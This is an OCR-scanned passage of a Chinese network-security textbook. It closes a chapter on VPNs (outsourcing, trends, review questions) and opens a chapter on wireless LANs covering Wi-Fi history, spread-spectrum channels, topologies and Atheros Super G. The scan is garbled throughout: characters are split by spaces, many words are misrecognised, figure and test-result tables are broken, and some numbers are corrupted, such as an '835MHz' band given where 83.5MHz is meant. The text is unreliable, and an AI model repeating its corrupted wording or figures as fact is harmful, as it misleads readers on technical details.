
首先 ,外 包 VPN 比 企业 自己 动手 建立 VPN 要 快 得 多 ,也 更 为 容易 。 其 次 ,外 包 VPN 
的 可 扩展 性 很 强 ,易于 企业 管理 。 有 统计 表明 ,使 用 外 包 VPN 方式 的 企业 ,可 以 支持 2300 
多 名 用 户 ,而 使 用 内 部 VPN 的 企业 只 能 支持 大 约 150 名 用 户 。 而 且 , 随 着 用 户 数量 的 增 
长 ,对 用 于 监控 ,管理 ,提供 IT 资源 和 人 力 资源 的 要 求 也 将 呈 指 数 增长 。 

综 上 所 述 ,企业 VPN 必须 将 安全 和 性 能 结合 在 一 起 ,然而 ,在 实际 情况 中 两 者 不 能 兼 
顾 。 例 如 ,对 安全 加 密级 别 的 配置 经 常 降低 VPN 的 整体 性 能 。 而 通过 提供 VPN 外 包 业 务 
的 专业 ISP 的 统一 管理 ,可 大 大 提高 VPN 的 性 能 和 安全 。ISP 的 VPN 专家 还 可 帮助 企业 
进行 VPN 决策 。 同 时 ,对 服务 水 平 协议 (SLA) 的 改进 和 服务 质量 (QoS) 的 保证 ,为 企业 外 
包 VPN 方式 提供 了 进一步 的 保证 。 


13.13 VPN 的 发 展 趋势 


随 着 PPTP 和 IPSec 协议 的 不 断 兼 容 ,VPN 发 展 趋势 中 最 明显 的 特征 之 一 ,就 是 趋 于 
使 用 统一 的 加 密 标准 和 封装 协议 ,这 样 有 利于 使 用 不 同 厂商 VPN 产品 的 用 户 方便 地 进行 
互联 ,进而 达到 信息 便捷 传递 的 目的 。 

另 一 个 VPN 技术 发 展 的 趋势 是 在 无 线 领域 中 的 应 用 。 随 着 最 大 CPU 生产 厂商 Intel 
公司 把 无 线 通信 芯片 集成 到 新 一 代 的 CPU 中 ,无 线 通 信 技 术 得 到 了 进一步 的 发 展 ,在 办 公 
室 、 宾 馆 、 机 场 架 设 无 线 局 域 网 的 项 目 也 越 来 越 多 。 第 三 代 无 线 通信 系统 的 发 展 也 由 纯 理论 
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发 展 到 了 使 用 阶段 ,有 关 无 线 通信 技术 的 相关 内 容 参 见 本 书 的 第 14 章 。 但 是 ,因为 无 线 网 
络 特有 的 开放 性 ,给 无 线 网 络 的 发 展 带 来 了 一 定 的 安全 隐患 ,而 VPN 技术 可 以 很 好 地 解决 
这 一 技术 难题 ,所 以 无 线 网 络 的 发 展 也 推动 了 VPN 技术 的 发 展 和 应 用 。 

随 着 VPN 技术 的 不 断 融 合并 趋 于 一 致 ,VPN 技术 在 市 场 的 需求 下 ,针对 不 同 的 应 用 环 
境 , 在 功能 上 却 趋 于 细 分 化 。 比 如 有 的 VPN 产品 偏重 于 安全 领域 有 的 则 偏重 于 通信 质 
量 , 而 有 的 则 偏重 于 价格 ,这 些 都 是 由 用 户 的 需求 和 通信 的 成 本 所 决定 的 。 

总 之 ,VPN 技术 的 发 展 是 由 市 场 和 用 户 决 定 的 。 未 来 VPN 的 产品 会 向 着 产品 兼容 性 
高 ,技术 模块 化 强 ,易于 用 户 组 合 使 用 不 同 模块 的 方向 发 展 ,最 终 VPN 产品 会 结合 防火 墙 
技术 .QoS 技术 等 相关 技术 ,在 用 户 的 需求 下 ,组 合 出 不 同 的 网 络 实施 方案 。 


习题 


.VPN 的 全 称 是 什么 ? 它 的 简要 定义 是 什么 ? 
. VPN 提供 了 哪 两 种 基本 安全 概念 ? 

. VPN 隧道 技术 主要 有 了 哪 几 种 ? 

. PPP 提供 的 验证 方式 有 哪 几 种 ? 

.IPSec 隧道 的 类 型 有 哪 两 种 ? 

. 实现 VPN 的 安全 技术 有 了 哪些? 

. VPN 在 企业 中 有 哪 三 种 组 网 方式 ? 

. 什么 是 MPLS VPN? 

.【 思 考题 ]VPN 技术 的 优 缺 点 是 什么 ? 


Do 人 wr 全 - 


CHAPTER Il4 


无 线 网 络 的 安全 技术 第 14 章 


随 着 IEEE 802. 11 无 线 局 域 网 技术 的 成 熟 ,无 线 技术 的 应 用 变 得 越 来 越 
广泛 ,无 线 网 络 的 安全 也 日 益 受到 人 们 的 重视 。 本 章 着 重 介绍 了 无 线 网 络 的 
发 展 历 程 ,无线 网 络 的 分 类 、 以 及 无 线 网 络 安全 方面 的 问题 。 

本 章 要 点 如 下 : 

。 无 线 网 络 概述 ; 

。 无 线 网 络 的 分 类 ; 

。 无 线 网 络 的 安全 策略 和 面临 的 威胁 。 


14. 1 无 线 网 络 概述 


Wi-Fi 是 WireLess Fidelity 的 缩写 , 它 代 表 Ethernet for WLAN, 专 指 
IEEE 802. 11b 无 线 标准 。 目 前 有 40 多 个 厂家 的 100 多 种 产品 通过 了 Wi-Fi 
认证 ,所 有 通过 认证 的 产品 将 颁发 Wi-Fi 证 书 , 贴 Wi-Fi 标志 ,用 户 购买 这 类 
产品 可 以 保证 它们 之 间 的 互 操 作 性 。Wi-Fi 图 标 如 图 14. 1 所 示 。 

IEEE 802. 11b 标准 是 在 IEEE 802. 11 的 基础 上 

发 展 起 来 的 , 它 工作 在 2. 4GHz 频段 ,最 高 传输 率 能 (Wi) 
够 达到 11Mb/s, 具 有 部 署 方便 、 通 信 可 靠 , 抗 干扰 能 
力 强 成 本 低 、. 灵 活性 好 、 移 动 性 强 吞吐 量 高 等 特点 。 
它 使 得 无 线 用 户 可 以 得 到 以 太 网 的 网 络 性 能 .速率 和 可 用 性 ,可 以 无 颖 地 将 
多 种 LAN 技术 集成 起 来 ,形成 能 够 最 大 限度 地 满足 用 户 需求 的 网 络 。 


14.1.1 无 线 网 络 的 发 展 


根据 2005 年 初 的 统计 ,全球 已 经 有 超出 5 万 个 Wi-Fi 热点 ,到 年 底 可 能 
翻 一 倍 。 所 谓 热点 (Hotspot) 是 指 位 于 公共 区 域 的 无 线 接 和 人 点, 用户 可 以 通 
过 这 个 接 入 点 以 无 线 方式 接 入 Internet, 通 常 这 些 热点 都 可 以 提供 接近 宽带 
的 访问 速率 。 

人 们 最 初 开始 尝试 无 线 上 网 是 通过 笔记 本 计算 机 连接 移动 电话 内 置 的 


图 14.1 Wi-Fi 图 标 
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Modem, 再 拨号 到 ISP ,而 这 种 拨号 上 网 方式 只 能 提供 14. 4kb/s 的 速率 ,后 来 出 现 了 GPRS 
(General Packet Radio Services ,通用 无 线 分 组 业务 ) 无 线 上 网 方式 ,通信 的 速率 有 所 提高 
(可 达到 33. 6kb/s) ,但 仍然 需要 通过 先 连 接手 机 (通过 红外 线 或 蓝牙 方式 ) 才 能 上 网 。 这 种 
无 线 上 网 方式 不 仅 麻烦 ,而 且 价格 也 非常 昂贵 (运营 商 通常 以 下 载 的 数据 量 来 计 费 ) 。 

20 世纪 90 年 代 中 期 ,一 种 速率 更 高 .更 方便 、 更 廉价 的 无 线 上 网 解决 方案 出 现 了 ,这 就 
是 IEEE(Institute of Electrical and Electronics Engineers ,电气 和 电子 工程 师 学 会 ) 发 布 的 
802. 11 无 线 网 络 标准 , 它 成 为 无 线 客户 端 和 无 线 接 人 点 之 间 的 通信 标准 。IEEE 802. 11 无 线 
网 络 标准 的 主要 目标 是 在 PC 之 间 建 立 高 速 无 线 连接 ,从 而 摆脱 网 线 的 束缚 。IEEE 802. 11 标 
准 随后 由 Wi-Fi 联盟 重新 命名 为 Wi-Fi 标准 ,因为 [EEE 802. 11 这 种 说 法 过 于 哪 唆 。 而 
Wi-Fi 一 词 并 没有 什么 实际 意义 , 它 看 起 来 更 像 音 响 界 常用 的 “Hi-Fi”(High-Fidelity 的 缩 
写 ) ,于 是 人 们 也 将 “Wi-Fi” 视 为 Wireless Fidelity 的 缩写 。 

11Mb/s 的 IEEE 802.11b 产 品 开始 让 人 们 体验 无 线 的 魅力 ,但 速度 上 还 是 略 显 不 
足 。 随 着 802. 11g 协议 (理论 速度 可 达 54Mb/s) 及 其 产品 的 推出 ,无 线 网 络 开 始 流行 起 
来 。 但 是 对 于 逐渐 流行 的 视频 传输 等 需求 ,无 线 网 络 的 网 速 还 是 有 些 慢 。 因 此 一 些 无 线 
厂商 推出 了 Pre-N 技术 ,如 MIMO(Multiple Input Multiple Output) ,其 原理 即 拥 绑 了 两 条 
IEEE 802. 11g 信道 ,通过 两 根 或 多 根 天 线 同 时 收发 ,提高 信号 的 强度 和 质量 ,所 以 可 以 达到 
双 倍 或 多 倍 的 速率 ,传输 速率 超过 了 100Mb/s。 


14.12 无 线 局 域 网 的 优点 


无 线 局 域 网 可 以 作 传统 有 线 网 络 的 延伸 ,在 某 些 环境 下 也 可 以 替代 传统 的 有 线 网 络 。 
对 比 于 传统 的 有 线 网 络 ,无 线 局 域 网 的 显著 特点 包括 以 下 几 点 。 

。 移动 性 : 在 大 楼 或 园区 内 ,局 域 网 用 户 不 管 在 任何 地 方 都 可 以 实时 的 信息 访问 。 
安装 的 灵活 性 : 无 线 技术 可 以 使 网 络 遍 及 有 线 所 不 能 到 达 的 地 方 。 同 时 避免 了 穿 
墙 或 过 天 花 板 布线 的 烦琐 工作 ,使 得 组 网 变 得 快速 又 简单 。 

。 减 少 投资 : 尽管 无 线 局 域 网 硬件 的 初始 投资 要 比 有 线 硬件 要 高 ,但 一 方面 无 线 网 络 
减少 了 布线 的 费用 , 另 一 方面 在 需要 频繁 移动 和 变化 的 动态 环境 中 ,无 线 局 域 网 的 
投资 更 具 回 报 性 。 

扩展 能 力 : 无 线 局 域 网 可 以 组 成 多 种 拓扑 结构 ,可 以 十 分 容易 地 从 少数 用 户 的 对 等 
网 络 模式 扩展 到 上 千 用 户 的 结构 化 网 络 模式 。 

应 用 范围 广 : 典型 的 无 线 局 域 网 络 应 用 包括 医院 、 学 校 ,金融 服务 、 制 造 业 、 服 务 业 、 
公共 访问 。 


14.1.3 无 线 局 域 网 技术 
1. 无 线 局 域 网 频道 分 配 与 调制 技术 


无 线 局 域 网 采用 电磁 波 (RF) 作 为 载体 传输 数据 信息 。 对 电磁 波 的 使 用 分 为 两 种 模式 : 
窄带 和 扩 频 。 窗 带 技术 以 微波 为 主 ,适用 于 长 距离 点 到 点 的 应 用 ,可 以 达到 40km 的 传输 距 
离 。 由 于 它 采 用 的 频道 较 宽 以 及 定向 信号 天 线 , 因 此 其 最 大 带宽 可 达 10Mb/s, 但 受 环境 干 
扰 较 大 。 
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无 线 局 域 网 采用 无 线 扩 频 (Spread Spectrum) 技 术 ,也 称 SST, 早 期 由 军事 部 门 研发 , 确 
保安 全 可 靠 的 军事 通信 。 常 见 的 扩 频 技术 包括 两 种 : 调频 扩 频 (FHSS) 和 直 序 扩 频 
(DSSS) ,它们 在 2.4~2. 4835GHz 工作 。 

调频 技术 将 835MHz 的 频带 划分 成 79 个 子 频 道 , 每 个 频道 带宽 为 1MHz。 信 号 传输 时 
在 79 个子 频道 间 跳 变 , 因 此 传输 方 与 接收 方 必须 同步 ,获得 相同 的 跳 变 格式 ,否则 ,接受 方 
无 法 接收 正确 的 信息 。 调 频 过 程 中 如 果 遇 到 某 个 频道 存在 干扰 ,将 绕 过 该 频道 。 受 跳 变 的 
时 间 间 隔 以 及 重 传 数据 包 的 影响 ,调频 技术 的 典型 带宽 限制 为 2 一 3Mb/s。 无 线 个 人 网 采 
用 的 蓝牙 (Bluetooth) 技 术 就 是 采用 调频 技术 ,该 技术 提供 非 对 称 数据 传输 ,一 个 方向 速率 
为 720kb/s, 另 一 个 方向 速率 仅 为 57kb/s。 蓝 牙 技术 也 可 以 传输 3 路 双向 64kb/s 的 话音 。 
直 序 扩 频 技术 是 无 线 局 域 网 IEEE 802. 11b 采用 的 技术 ,将 835MHz 的 频带 划分 成 14 个 子 
频道 ,每 个 频道 带宽 为 22MHz。 直 序 扩 频 技术 用 一 个 宛 余 的 位 格式 来 表示 一 个 数据 位 ,这 
个 元 余 的 位 格式 称 为 Chip, 因 此 它 可 以 抗拒 窄带 和 宽带 噪音 的 干扰 ,提供 更 高 的 传输 速率 。 
直 序 扩 频 技术 采用 采用 DBPSK 和 DQPSK 调制 技术 ,提供 的 最 高 带宽 为 11Mb/s, 并 且 可 
以 根据 环境 因素 的 限制 自动 降 速 至 5. 5Mb/s、2Mb/s、1Mb/s。14 个 子 频道 分 配 如 图 14. 2 
所 示 。 


2.417 2.427 2 2.447 2.457 二 放 
| | 
| 
i | | 
3 8 13 
2 2 12 | 


2.412 2.422 2.432 2.442 2.452 2.462 2.472 2.482 
14.2 子 频道 分 配 图 


在 多 个 频道 同时 工作 的 情况 下 ,为 保证 频道 之 间 不 相互 干扰 ,标准 的 要 求 是 两 个 频道 的 
中 频 间 隔 不 能 低 于 30MHz。 因 此 从 图 14. 2 可 以 看 出 ,在 一 个 蜂窝 区 (一 定 的 无 线 传 播 区 
域 ) 内 , 直 序 扩 频 技术 最 多 可 以 提供 3 个 不 重 释 的 频道 同时 工作 ,提供 高 达 33Mb/s 的 吞 
吐 量 。 


2. 无 线 局 域 网 拓扑 结构 


无 线 局 域 网 组 网 结构 分 为 两 种 拓扑 结构 : 对 等 网 络 和 结构 化 网 络 。 

对 等 网 络 也 称 Ad-hoc 网 络 , 它 覆盖 的 服务 区 称 独立 基本 服务 区 。 对 等 网 络 用 于 一 台 
无 线 工作 站 和 另 一 台 或 多 台 其 他 无 线 工作 站 的 直接 通信 ,该 网 络 无 法 接 入 到 有 线 网 络 中 ,只 
能 独立 使 用 。 无 线 局 域 网 拓扑 结构 如 图 14. 3 所 示 。 

对 等 网 络 中 的 一 个 结 点 必须 能 同时 “看 ”到 网 络 中 的 其 他 结 点 ,否则 就 认为 网 络 中 断 , 因 
此 对 等 网 络 只 能 用 于 少数 用 户 的 组 网 环境 ,如 4 一 8 个 用 户 , 并 且 他 们 要 高 得 足够 近 。 

结构 化 网 络 由 无 线 访问 点 (AP) 无 线 工作 站 (CSTA) 以 及 分 布 式 系统 (DSS) 构 成 ,覆盖 
的 区 域 分 为 基本 服务 区 (BSS) 和 扩展 服务 区 (ESS)。 无 线 访问 点 也 称 为 无 线 Hub, 用 于 在 
无 线 STA 和 有 线 网 络 之 间接 收 、 缓 存 和 转发 数据 。 无 线 访问 点 通常 能 够 覆盖 几 十 至 几 百 用 
户 ,覆盖 半径 达 上 百 米 。 
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点 对 点 或 热点 网 基础 网 络 
图 14.3 ”无线 局 域 网 拓扑 图 


基本 服务 区 由 一 个 无 线 访问 点 以 及 与 其 关联 (associate) 的 无 线 工 作 站 构成 ,在 任何 时 
候 、 任 何 无 线 工 作 站 都 与 该 无 线 访问 点 关联 。 换 名 话说 ,一 个 无 线 访问 点 所 覆盖 的 微 蜂窝 区 
域 就 是 基本 服务 区 。 无 线 工作 站 与 无 线 访 问 点 关联 采用 AP 的 基本 服务 区 标识 符 
(BSSID) ,在 IEEE 802.11 中 ,BSSID 是 AP 的 MAC 地 址 。IEEE 802. 11 网 络 覆 盖 示 意图 
如 图 14.4 所 示 。 


802.11 的 构成 
BBS 1 


802.1 xLAN 


802.1 MAC/PHY 


图 14.4 无 线 局 域 网 网 络 覆盖 示意 图 


扩展 服务 区 是 指 由 多 个 AP 以 及 连接 它们 的 分 布 式 系统 组 成 的 结构 化 网 络 , 所 有 AP 
必需 共享 同一 个 扩展 服务 区 标识 符 (ESSID) , 即 扩展 服务 区 ESS 中 包含 多 个 BSS。 分 布 式 
系统 在 IEEE 802. 11 标准 中 并 没有 定义 ,但 是 大 多 数 情况 指 以 太 网 。 

扩展 服务 区 是 一 个 两 层 网 络 结构 ,对 于 高 层 协议 (如 IP) 来 说 , 它 只 是 一 个 子 网 的 概念 。 


3. 局 域 网 的 几 个 主要 工作 过 程 


扫 频 ; STA 在 加 入 服务 区 之 前 要 查找 哪个 频道 有 数据 信号 。 扫 频 分 为 主动 和 被 动 两 
种 方式 。 主 动 扫 频 是 指 STA 启动 或 关联 成 功 后 扫描 所 有 频道 。 在 一 次 扫描 中 ,STA 采用 
一 组 频道 作为 扫描 范围 ,如 果 发 现 某 个 频道 空闲 ,就 广播 带 有 ESSID 的 探测 信号 ,AP 根据 
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该 信号 做 出 响应 ; 被 动 扫 频 是 指 AP 每 100ms 向 外 传输 灯塔 信号 ,包括 用 于 STA 同步 的 时 
间 截 .支持 速率 以 及 其 他 信息 ,STA 接收 到 灯塔 信号 后 启动 关联 过 程 。 

关联 : 用 于 建立 无 线 访问 点 和 无 线 工 作 站 之 间 的 映射 关系 。 分 布 式 系 统 将 该 映射 关系 
分 发 给 扩展 服务 区 中 的 所 有 AP。 一 个 无 线 工 作 站 同时 只 能 与 一 个 AP 关联 。 在 关联 过 程 
中 ,无 线 工作 站 与 AP 之 间 要 根据 信号 的 强 弱 协商 速率 ,速率 变化 包括 : 11Mb/s、5. 5Mb/s、 
2Mb/s 和 1Mb/s。 

重 关联 (reassociate) : 当 无 线 工作 站 从 一 个 扩展 服务 区 中 的 一 个 基本 服务 区 移动 到 另 
外 一 个 基本 服务 区 时 与 新 的 AP 关联 的 整个 过 程 。 重 关联 总 是 由 移动 无 线 工作 站 发 起 。 

漫游 : 指 无 线 工 作 站 在 一 组 无 线 访问 点 之 间 移 动 , 并 提供 对 于 用 户 透 明 的 无 颖 连接 , 包 
括 基本 漫游 和 扩展 漫游 。 基 本 漫游 是 指 无 线 STA 的 移动 仅 局 限 在 一 个 扩展 服务 区 内 部 。 
无 线 漫游 示意 图 如 图 14. 5 所 示 。 


图 14.5 无 线 网 络 漫游 示意 图 


扩展 漫游 指 无 线 STA 从 一 个 扩展 服务 区 中 的 一 个 BSS 移动 到 另 一 个 扩展 服务 区 的 一 
个 BSS,IEEE 802. 11 并 不 保证 这 种 漫游 的 上 层 连接 。 常 见 做 法 是 采用 mobile IP 或 动态 
DHCP. 


4. 影响 无 线 局 域 网 性 能 的 因素 


影响 无 线 局 域 网 性 能 的 因素 通常 有 以 下 几 点 : 

。 传输 功率 ,通常 无 线 AP 发 送 功率 为 100mW。 

。 天线 类 型 和 方向 。 

。 噪声 和 干扰 ,包括 授权 用 户 微波炉、 有 意 干扰 等 。 
。 建筑 物 结构 ,这 可 能 引发 多 路 经 、 穿 透 效 应 等 问题 。 
。 无线 访问 点 摆 放 的 位 置 。 


14.14 无 线 通 信 技 术 比 较 


目前 主要 有 GLOBESPAN、TI 和 ATHEROS 三 家 供应 商 提供 无 线 传输 的 提速 程序 ,他 们 
基于 各 自 的 产品 开发 出 不 同 的 加 速 软件 ,目的 是 提高 网 络 的 传输 速率 ,避免 IEEE 802. 11g 和 
802. 11b 的 数据 包 冲 突 。 虽 然 他 们 的 目的 是 一 样 ,但 是 这 几 种 加 速 软件 的 实现 机 制 却 有 所 
差异 。 下 面 对 流 行 的 SuperG、MIMO 技术 进行 比较 。 
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1. Super G 技术 


Atheros Super G 是 最 早 实现 108Mb/s 速率 的 无 线 网 络 技术 , 它 在 技术 上 完全 是 以 
IEEE 802. 11g 为 基础 的 ,因此 能 够 在 IEEE 802. 11g 发 布 后 的 最 短 时 间 内 推出 。Super G 
采用 了 频道 绑 定 ,动态 包 突 发 机 制 , 快 速 帧 和 硬件 压缩 /解压 缩 和 加 密 等 几 项 技术 来 进一步 
提高 无 线 网 络 的 性 能 ,而 其 中 起 关键 作用 的 是 频道 绑 定 技术 。 

(1) 频道 绑 定 (channel bonding) 技 术 

频道 绑 定 技术 的 实现 方法 很 简单 : 利用 两 个 频道 同时 传输 达到 性 能 增 倍 的 目的 。 这 种 
双 频 捆绑 模式 看 上 去 像 在 一 个 单独 的 信道 里 接收 和 发 送 。 对 Super G 108Mb/s 超级 无 线 
而 言 , 不 仅 可 获得 两 倍 于 IEEE 802. 11g 标准 54Mb/s 的 数据 传输 速率 ,同时 它 也 增加 了 网 
络 的 有 效 覆 盖 范 围 。 通 常用 户 距离 无 线路 由 器 越 远 ,数据 速率 越 低 。 但 采用 绑 定 技术 后 ,在 
任何 特定 距离 内 的 数据 传输 速率 都 是 双 倍 的 。 

IEEE 802.11 规范 了 从 2.4GHz 到 2.4835GHz 之 间 83. 5MHz 的 空间 ,并 且 将 这 段 频 
谱 空 间 分 割 成 11 个 频道 (美国 为 11 个 频道 ,中 国 和 欧洲 为 13 个 频道 ) ,而 每 个 频道 占用 
22MHz 频带 。 虽 然 采 用 双 频 绑 定 减少 了 网 络 中 可 用 的 频道 数 ,但 Super G 产品 至 少 有 11 
个 频道 (实际 的 频道 数 根据 当地 政府 的 规定 ) ,对 于 家 庭 和 小 型 办 公 环境 足够 了 。 

在 IEEE 802.11b 和 IEEE 802. 11g 标准 中 ,无线 设备 只 能 使 用 其 中 一 个 频道 来 传输 数 
据 , 如 果 覆 盖 范 围 内 存在 多 个 不 同 的 无 线 网 络 ,那么 不 同 网 络 就 使 用 不 同 的 频道 以 避免 干 
扰 。 与 这 两 者 不 同 的 是 ,Super G 将 两 个 频道 拥 绑 起 来 ,让 它们 并 行 工 作 , 从 宏观 角度 看 , 绑 
定 后 的 双 频 传输 相当 于 在 一 个 单独 的 信道 里 接收 和 发 送 , 这 种 并 行 运作 的 方法 让 Super G 
可 以 获得 两 倍 IEEE 802. 11g 的 传输 速率 ,而 且 由 于 信号 双 倍 的 增强 ,网 络 的 覆盖 范围 也 得 
到 了 拓展 一 一 理论 上 相当 于 在 任何 特定 距离 内 的 数据 传输 速率 比 IEEE 802. 11g 增加 了 
一 倍 。 

Atheros 测试 结果 如 图 14.6 所 示 。 

(2) 快速 帧 (fast frames) 技 术 

Super G 的 快速 帧 技术 同样 是 为 提高 传输 速率 服务 的 。 一 个 快速 帧 由 数据 包 . 有 效 载荷 
和 一 个 数据 头 组 成 ,数据 头 中 直接 包含 了 诸如 有 关 数 据 所 要 发 至 目的 地 的 系统 地 址 等 信息 。 
如 果 多 个 数据 包 的 目的 地 址 是 相同 的 , 则 它们 就 可 以 被 放 在 同一 个 数据 帧 内 ,在 数据 传输 过 
程 中 只 要 做 到 地 址 依次 定位 , 便 可 以 将 所 有 的 数据 全 部 送 达 ,而 不 必 和 IEEE 802. 11byg 一 
样 需要 为 每 个 数据 包 都 做 一 次 定 址 操作 。 该 功能 类 似 于 帧 串联 。 

快速 帧 技术 同样 也 为 IEEE 802. 11e 的 服务 质量 (QoS) 草 案 所 支持 ,在 纯 Super G 系统 
中 它 可 以 正常 运作 ,如 果 其 他 的 无 限 设备 不 支持 该 项 特性 ,Super G 设备 便 会 自动 返回 到 单 
数据 包 状 态 ,以 兼容 网 络 中 的 其 他 产品 (IEEE 802. 11e 作为 一 项 可 以 改善 无 线 局 域 网 上 音 
频 和 视频 质量 的 新 标准 ,定义 了 无 线 局 域 网 的 服务 质量 (Quality of Service QoS) ,例如 对 语 
音 IP(Voice over IP) 的 支持 。 另 外 ,Super G 对 传输 的 数据 包 进 行 预 先 压缩 处 理 一 一 在 很 
多 通信 过 程 中 ,通过 对 数据 进行 压缩 处 理 , 可 起 到 增 大 传输 数据 量 的 效果 ,也 就 相当 于 提高 
了 数据 传输 速率 。Super G 同样 支持 压缩 后 再 传输 的 处 理 机 制 , 目 标 设备 接收 到 后 再 进行 
解压 所 采用 的 压缩 算法 是 由 以 色 列 数学 家 A. Lempel 和 J. Ziv 共同 开发 的 Lempel-Ziv 压缩 
算法 。 由 于 压缩 后 信息 变 得 很 小 ,资源 占用 率 低 ,这样 网 络 上 便 可 以 承载 更 多 的 数据 交换 。 
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802.11g.Channel6 


Uni-directional Chariot test Uplink(STA->Ap) Uplink(STA->Ap) 

DATA #1 29.496| 

DATA #2 35.503 

DATA #3 53.341 

Uni-directional Chariot test Uplink(STA->STA) Downlink(AP->STA) 
DATA #1 24.453 
DATA 杞 40.681 
DATA #3 69.838 
Bi-directional Chariot test Uplink(STA->Ap) Downlink(AP->STA) 


DATA #1 14.208 
DATA 起 22.459 
DATA #3 34.892 


802.11g,Static Turbo.Channel6 


Uni-directional Chariot test Uplink(STA->Ap) Uplink(STA->Ap) 
DATA #1 41.347 
DATA# 48.335 
DATA #3 72.947 
Uni-directional Chariot test Uplink(STA->STA) 

DATA #1 

DATA 要 

DATA #3 


Bi-directional Chariot test Uplink(STA->Ap) 
DATA #1 
DATA 起 


DATA #3 


图 14.6 ”Atheros 测试 结果 


Super G 采用 硬件 压缩 ,不 会 对 系统 资源 带 来 负面 影响 。 

(3) 包 突 发 机 制 (frame bursting) 技 术 

在 传输 效率 方面 ,Super G 比 IEEE 802. 11b/g 也 都 有 明显 的 改善 ,起 关键 作用 的 便 
是 Super G 的 动态 包 突 发 机 制 (Packet Burating)。 在 一 个 IEEE 802. 11b/g 的 标准 传输 
中 ,每 一 个 数据 包 发 送 后 都 会 有 一 个 暂停 ,以 允许 其 他 设备 有 竞争 网 络 资源 的 机 会 ,这 种 
处 理 方法 实际 上 比较 被 动 ; 而 Super G 所 引入 的 动态 包 突 发 机 制 将 这 个 暂停 状态 取消 了 ， 
但 它 在 不 停顿 发 送 数 据 包 的 同时 对 结 点 进行 检查 ,如 果 收 到 资源 调用 请 求 就 会 暂停 ,如 果 没 
有 收 到 请 求 ,Super G 网 络 将 不 停 地 进行 数据 的 传输 。Super G 的 动态 包 突 发 机 制 有 效 地 减 
少 了 资源 的 浪费 ,达到 了 增加 发 送 数据 包 数 量 的 目的 。 其 实际 效果 明显 要 优 于 常规 的 
IEEE 802. 11b/g 方案 ,另外 ,动态 包 突 发 机 制 利 用 了 IEEE 802. 11e 的 服务 质量 (QoS) 的 标 
准 草案 , 它 可 自动 调整 数据 包 的 大 小 和 传输 时 间 , 以 适应 不 同 的 连接 速率 和 协议 ,这 在 
IEEE 802. 11 b、IEEE 80211g、Super G 三 者 混合 使 用 的 网 络 中 尤为 重要 。 但 无 论 从 哪个 角 
度 来 看 ,混合 使 用 不 同 标准 的 网 络 都 是 不 明智 的 。 

(4) 硬件 压缩 机 制 (compression) 技 术 

因为 其 压缩 后 信息 很 小 ,数据 传输 更 快 ,释放 出 无 线 局 域 网 资源 给 其 他 设备 进行 数据 传 
输 。 所 以 Super G 无 线 产品 使 用 全 硬件 机 制 从 而 可 大 大 提高 整体 的 网 络 性 能 。 

(5) 动态 切换 (Dynamic Turbo) 技 术 

动态 Turbo 能 从 108Mb/s 自动 调 速 到 IEEE 802. 11g 或 IEEE 802. 11B 的 标准 速率 ,使 所 
有 结 点 在 网 络 中 都 高 速 运行 。Super G 产品 支持 在 108Mb/s Super G 模式 .IEEE 802. 11lg、 
IEEE 802. 11b 以 及 标准 的 Turbo 模式 间 切 换 。 动 态 Turbo 允许 无 线 网 络 的 多 个 结 点 应 用 
不 同 的 协议 (例如 IEEE 802. 11b 和 108Mb/s) ,以 适应 每 个 结 点 尽 可 能 高 的 速率 。 
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(6) Super G 技术 的 优点 

由 于 这 些 技术 的 综合 运用 , 令 Super G 在 性 能 上 明显 优 于 IEEE 802. 11g 和 IEEE 802. 
11b, 在 相同 的 情况 下 ,Super G 系统 的 传输 速率 可 以 达到 IEEE 802. 11g 的 1.5 倍 或 2 倍 ， 
IEEE 802. 11b 的 5 一 6 倍 ,也 就 是 在 理想 状态 下 获得 30 一 40Mbys 的 实际 速率 。 尽 管 这 与 
Super G 理论 上 的 108Mb/s 性 能 差距 甚 远 ,但 比 起 现 有 的 IEEE 802. 11g 和 IEEE 802. 11b 
产品 是 一 个 很 大 的 进步 。 在 覆盖 范围 方面 ,Super G 同样 表现 出 色 ,通信 距离 最 远 可 达 60m 
(室外 无 障碍 物 环 境 ) ,此 时 仍然 可 获得 13Mb/s 的 实际 速率 ,这 比 IEEE 802. 11g 的 最 佳 速 
度 快 了 不 少 ,如果 距 离 延 长 到 90m, Super G 依然 可 以 获得 5Mb/s 的 实际 传输 速率 ,而 
IEEE 802. 11b 设备 即使 在 最 佳 状态 下 传输 性 能 也 不 过 如 此 。 在 兼容 性 方面 ,Super G 同样 
表现 良好 , 它 采 用 动态 108Mb/s 传输 机 制 , 可 根据 网 络 情况 自动 调 速 到 IEEE 802. 11g 或 
IEEE 802. 11b, 以 保证 对 其 他 无 线 设备 的 兼容 性 。 与 之 对 应 ,Super G 产品 可 支持 108Mb/s 
Super G IEEE 802. 11g、IEEE 802. 11b 和 标准 的 Turbo 动态 等 四 种 工作 模式 ,其 中 动态 
模式 允许 无 线 网 络 的 不 同 结 点 应 用 不 同 的 协议 (如 可 以 选择 108Mb/s Super G、IEEE 
802. 11g、IEEE 802. 11b 等 不 同 协议 ) ,以 充分 保障 各 个 结 点 都 能 获得 尽 可 能 高 的 传输 
性 能 。 

另外 ,Super G 将 IEEE 802. 11e QoS 协议 草案 的 部 分 内 容纳 入 其 中 ,使 得 Super G 网 
络 在 QoS( 服 务 质量 ) 方 面 有 更 出 色 的 表现 一 一 这 主要 体现 在 无 线 多 媒体 数据 流 的 传输 , 例 
如 ,用 户 通 过 Super G 无 线 网 络 播放 其 他 计算 机 存储 的 音频 或 视频 数据 时 ,即使 该 用 户 还 在 
同步 进行 其 他 大 文件 传输 、Web 浏览 或 者 有 其 他 用 户 占 用 资源 ,也 不 会 影响 到 流 媒体 播放 
的 流畅 度 。 因 此 ,商务 用 户 可 以 在 Super G 无 线 网 络 中 享受 便捷 的 电话 会 议 。 语 音 通信 或 
实时 视频 交流 等 。 

Super G 技术 出 现 后 获得 了 无 线 设 备 商 的 热烈 响应 , 绝 大 多 数 供应 商都 支持 该 技术 并 
积极 推出 相应 的 产品 。 作 为 Super G 技术 拥有 者 和 无 线 控制 芯片 的 研发 商 ,Atheros 公司 
成 为 最 大 的 受益 者 。 

(7) Super G 技术 的 不 足 

Super G 技术 也 存在 自己 的 不 足 , 它 很 容易 对 同 区 域内 的 其 他 无 线 局 域 网 产生 干扰 。 
IEEE 802. 11 协议 将 2. 4 一 2.4835GHz 之 间 83. 5MHz 的 空间 分 成 11 个 频道 , 因 每 个 频道 
占用 22MHz 频带 ,所 以 只 有 频道 1(2. 401 一 2. 423GHz) ,频道 6(2. 425 一 2. 447GHz) 和 频 
